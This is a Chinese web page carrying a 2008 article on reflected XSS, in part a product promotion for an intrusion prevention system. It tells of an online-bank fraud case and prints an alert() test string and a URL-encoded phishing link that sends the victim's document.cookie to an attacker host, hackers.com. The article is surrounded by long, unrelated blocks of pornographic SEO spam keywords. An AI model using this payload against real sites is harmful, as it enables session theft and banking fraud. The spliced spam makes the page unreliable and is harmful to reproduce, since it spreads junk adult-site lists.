国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

長URL背后的殺機 網(wǎng)站防范XSS攻擊實錄
2008-12-03   

XSS(Cross-site scripting)攻擊是最常見的Web攻擊之一,和其它Web攻擊類似的是,XSS也是利用Web頁面編碼的不嚴謹,和SQL注入漏洞所不同的是,XSS漏洞更加難以發(fā)現(xiàn)避免。就連McAfee、Symantec、VeriSign這種專業(yè)安全公司,也在2008年1月的XEED.com報告中被爆出官網(wǎng)存在XSS漏洞。

此外,XSS攻擊還有另外一個與眾不同的特性:雖然駭客利用的是Web業(yè)務系統(tǒng)存在的漏洞,但真正的受害者卻是隨后訪問這些Web系統(tǒng)的用戶。

正是由于以上兩個特性——難以避免、難以察覺,所以想要防御XSS攻擊非常困難。啟明星辰推出的天清入侵防御產(chǎn)品,采用基于攻擊手法分析的檢測方法,對Web威脅如SQL注入、XSS攻擊等進行全面檢測和防御。與傳統(tǒng)的基于數(shù)據(jù)特征匹配和基于異常模型構(gòu)建的Web安全相比,有著更低的漏報率和誤報率。

1.網(wǎng)上銀行謹防XSS攻擊

大家都用過網(wǎng)站的搜索功能,提供一個搜索輸入框,用戶在框中輸入想要查找的內(nèi)容,提交后臺數(shù)據(jù)庫檢索。但如果提交的輸入信息不是字符串,而是一段可執(zhí)行指令呢?一個很常見的XSS例子,在輸入框中填入“"><SCRIPT>alert('XSS%20Testing')</SCRIPT>”(不包括最外側(cè)的雙引號),一些沒有做嚴格過濾的站點將會彈出一個alert框,顯示“XSS Testing”,這意味著這段腳本已經(jīng)被執(zhí)行了。Reflect-based XSS(反射式XSS)利用的就是這樣一個原理。

下就是一則利用XSS漏洞進行網(wǎng)銀詐騙的真實案例。

小陳是ebank  網(wǎng)上銀行的安全維護人員,有一天忽然接到客服部門轉(zhuǎn)來的客戶投訴,稱收到一條交易提醒,但該客戶僅做過網(wǎng)上銀行的登錄,并沒有做過付款動作。

“你們給我發(fā)了一封郵件,說是有分期付款買筆記本電腦的優(yōu)惠活動,我就點鏈接進來看,可沒幾分鐘,我就收到交易提醒,說網(wǎng)上付款4784元,請我確認,但我還沒下單呢,你們這是怎么回事?”電話里客戶的聲音明顯帶著壓抑不住的憤怒。
經(jīng)過確認,該客戶使用的PC并不存在病毒,而且也的確是僅點擊了廣告郵件的鏈接而已。“那你把這封郵件發(fā)給我看看吧”,小陳在排除了其它可能性后,這么告訴客戶,“分析出結(jié)果我們的客服人員將第一時間通知您,您現(xiàn)在的這筆費用我們先凍結(jié),待解決后給您恢復”。

在收到客戶轉(zhuǎn)發(fā)來的郵件后,小陳第一眼就看出了問題,這不是ebank的系統(tǒng)郵件,而是一封釣魚郵件,偽造了發(fā)件人名稱的釣魚郵件。其中關(guān)于促銷優(yōu)惠活動的頁面都是截取了真實活動頁面,但在“點擊參加活動”的按鈕后面,卻隱藏著重重的殺機。
這個鏈接并非是正常促銷活動所在的頁面,而是如下所示的一個長URL

<ahref="http://www.ebank.com/query.asp?word=%3Cscript%3Evar+img+%3D+new+Image%28%29%

3Bimg.src%3D%22http%3A%2F%2Fwww.hackers.com%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E+">點擊參加活動</a>

一般的用戶在看到URL開頭是正確的網(wǎng)站域名ebank,都不會懷疑郵件的真實性,而駭客正是利用這一心理,精心設置了圈套,利用了Ebank的某個輸入域中存在反射式XSS攻擊漏洞,通過<script>標簽注入

"var img = new Image();img.src="

小陳拿著分析結(jié)果去找信息中心沈主任匯報,而沈主任果然經(jīng)驗豐富:“先發(fā)布網(wǎng)站緊急通知,告知用戶注意不要隨意點擊鏈接,然后迅速找專業(yè)安全公司做安全服務,查清問題的根源再說。”并立刻聯(lián)系了專業(yè)安全廠商啟明星辰的當?shù)劁N售人員。

經(jīng)過安星遠程網(wǎng)站安全檢查服務的檢測,發(fā)現(xiàn)ebank的網(wǎng)站存在數(shù)個XSS和SQL注入的漏洞,考慮到代碼級修改費時太長,沈主任決定雙管齊下,一方面找開發(fā)人員修補現(xiàn)有漏洞,一方面咨詢是否有現(xiàn)成的專業(yè)安全產(chǎn)品可以防范XSS攻擊。在對比了數(shù)家國內(nèi)外的安全產(chǎn)品后,啟明星辰天清入侵防御產(chǎn)品的專業(yè)的Web安全防御能力給沈主任留下了深刻的印象,特別是其采用了攻擊機理分析方式,在防范XSS攻擊和SQL注入方面都有很好的效果。對網(wǎng)銀來說,時間可就是真金白銀,所以沈主任當機立斷先購買一臺天清入侵防御系統(tǒng),并迅速上線。當小陳嘗試用原來的長URL進行XSS攻擊時,發(fā)現(xiàn)天清入侵防御產(chǎn)品信息報警監(jiān)視臺上已經(jīng)出現(xiàn)了報警信息并進行了及時的阻斷。

2.相關(guān)提示

反射式XSS攻擊的對象如果是網(wǎng)站管理員,那么整個網(wǎng)站的權(quán)限都有可能因此而泄露給駭客。作為網(wǎng)站的所有者,不能因為受攻擊者只是普通用戶而對反射式XSS攻擊掉以輕心,采用專業(yè)的安全產(chǎn)品或仔細檢查你的所有頁面,既是對用戶負責也保障了自己的安全。而普通用戶也需要加強自身的安全意識:采用擁有反向地址檢查技術(shù)的郵件系統(tǒng),盡量不要點擊過長且包含未知域名的URL,當然,采用一款防反射式XSS攻擊的瀏覽器,比如IE8,也是很有必要的。


熱詞搜索:

上一篇:對江西某電信服務器的一次安全檢查(1)
下一篇:利用跨站請求偽造攻擊本地網(wǎng)絡設備

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲日本在线看| 在线观看区一区二| 一区二区三区四区精品在线视频 | 亚洲视频在线观看一区| 91超碰这里只有精品国产| 成人亚洲精品久久久久软件| 亚洲高清视频中文字幕| 国产精品丝袜黑色高跟| 日韩视频在线观看一区二区| 色女孩综合影院| 国产中文字幕精品| 午夜国产精品影院在线观看| 亚洲免费在线视频一区 二区| 久久香蕉国产线看观看99| 欧美又粗又大又爽| 丁香激情综合五月| 青青草原综合久久大伊人精品优势| 国产午夜久久久久| 欧美欧美欧美欧美首页| 成人精品免费网站| 午夜精品福利一区二区三区av | 欧美国产乱子伦 | 麻豆精品一区二区av白丝在线| 久久美女艺术照精彩视频福利播放| av中文字幕亚洲| 视频一区国产视频| 久久久www成人免费无遮挡大片| 在线观看一区二区视频| 国产精品一区二区不卡| 亚洲成a人在线观看| 日韩美女视频19| 久久青草国产手机看片福利盒子 | 欧美撒尿777hd撒尿| 高清国产午夜精品久久久久久| 亚洲18色成人| 亚洲精品网站在线观看| 日本一区免费视频| 日韩精品一区二区三区三区免费| 在线观看免费成人| 99综合电影在线视频| 国产乱码精品一区二区三区五月婷| 亚洲成人av在线电影| 综合久久综合久久| 中文字幕av一区二区三区免费看| 精品国产免费一区二区三区四区 | 欧美色精品在线视频| www.欧美日韩| 国产成人免费视频| 国产伦精一区二区三区| 久久精品国产第一区二区三区| 偷窥少妇高潮呻吟av久久免费| 2017欧美狠狠色| 欧美刺激午夜性久久久久久久| 欧美剧情片在线观看| 91麻豆国产在线观看| eeuss鲁片一区二区三区在线观看 eeuss鲁片一区二区三区在线看 | 在线免费av一区| 91香蕉国产在线观看软件| 国产一区亚洲一区| 久久久久久免费毛片精品| 五月激情综合网| 亚洲黄色av一区| 亚洲色图第一区| 综合精品久久久| 国产精品不卡视频| 中文字幕在线不卡一区| 国产精品精品国产色婷婷| 欧美激情中文字幕一区二区| 国产精品久久毛片| 国产精品不卡一区| 一区二区在线观看视频| 亚洲自拍偷拍av| 亚洲18女电影在线观看| 免费成人美女在线观看| 极品尤物av久久免费看| 国产精品影音先锋| 成人免费高清在线| 色综合天天在线| 在线观看亚洲精品| 欧美一区二区三区影视| 欧美成人精品福利| 国产欧美日韩综合精品一区二区| 久久久久国产精品厨房| 中文字幕一区二区三区视频| 一区二区欧美精品| 日韩精品视频网| 日韩和欧美一区二区| 免费观看久久久4p| 国产一区二区在线看| 国产激情视频一区二区三区欧美 | 亚洲欧洲一区二区在线播放| 亚洲精品久久7777| 日本成人在线电影网| 国产.欧美.日韩| 在线欧美一区二区| 精品福利av导航| 日韩毛片在线免费观看| 亚洲不卡一区二区三区| 国内一区二区在线| 91碰在线视频| 91精品国产综合久久精品图片| 久久一区二区三区四区| 亚洲视频 欧洲视频| 日韩电影网1区2区| 成人性色生活片| 欧美亚洲国产一区在线观看网站 | www.欧美日韩| 91精品国产手机| 中文字幕亚洲成人| 日本欧美一区二区| 91在线看国产| 精品福利视频一区二区三区| 亚洲制服丝袜一区| 国产成人日日夜夜| 7777精品伊人久久久大香线蕉| 国产欧美一区二区在线观看| 五月天激情综合网| 99久久精品国产一区二区三区| 色婷婷激情久久| 日韩精品一区二区三区在线观看 | 粗大黑人巨茎大战欧美成人| 在线欧美日韩精品| 久久久久97国产精华液好用吗| 中文字幕 久热精品 视频在线| 亚洲成人免费在线观看| 国产成人小视频| 在线成人免费视频| 国产精品久久久久9999吃药| 亚洲成人黄色影院| 精品无人码麻豆乱码1区2区 | 91色视频在线| 国产婷婷一区二区| 麻豆一区二区三区| 欧美午夜精品久久久久久超碰 | 欧美日韩一区二区三区在线看| 日本一区二区三区在线观看| 麻豆久久久久久| 欧美理论片在线| 亚洲国产一二三| 91最新地址在线播放| 欧美精品一区二区三区高清aⅴ| 最新成人av在线| 美女性感视频久久| 欧美日韩另类一区| 亚洲欧洲av色图| 丁香另类激情小说| 久久精品视频在线看| 亚洲成人av中文| 欧美探花视频资源| 亚洲精品久久久久久国产精华液| 成人小视频免费观看| 国产欧美日韩视频在线观看| 精品在线播放免费| 日韩女优制服丝袜电影| 日本视频在线一区| 欧美美女一区二区| 亚洲成人第一页| 制服.丝袜.亚洲.另类.中文 | 国产欧美精品一区二区色综合| 国产一区二区在线看| 精品国产凹凸成av人网站| 秋霞电影网一区二区| 日韩精品影音先锋| 韩国成人精品a∨在线观看| 亚洲v日本v欧美v久久精品| 国产人妖乱国产精品人妖| 亚洲大片一区二区三区| 在线亚洲一区二区| 亚洲一区av在线| 欧洲精品一区二区三区在线观看| 一区二区三区加勒比av| 欧美亚洲综合色| 无码av中文一区二区三区桃花岛| 在线91免费看| 久久国产精品99久久久久久老狼| 欧美电影免费观看完整版| 国产在线视频一区二区三区| 欧美激情一区二区三区全黄| 激情五月激情综合网| 日韩免费福利电影在线观看| 国内精品伊人久久久久av一坑| 久久精品亚洲国产奇米99| 成人一道本在线| 亚洲五码中文字幕| 日韩欧美一区在线| 国产不卡视频一区二区三区| 亚洲欧美日韩国产中文在线| 欧美久久一区二区| 国模冰冰炮一区二区| 国产精品嫩草99a| 欧美日韩亚州综合| 激情六月婷婷综合| 亚洲欧美自拍偷拍色图| 欧美色综合影院| 国内欧美视频一区二区| 亚洲婷婷综合久久一本伊一区| 欧美日韩亚州综合| 国产成人亚洲综合色影视| 亚洲国产精品99久久久久久久久| 天堂久久一区二区三区|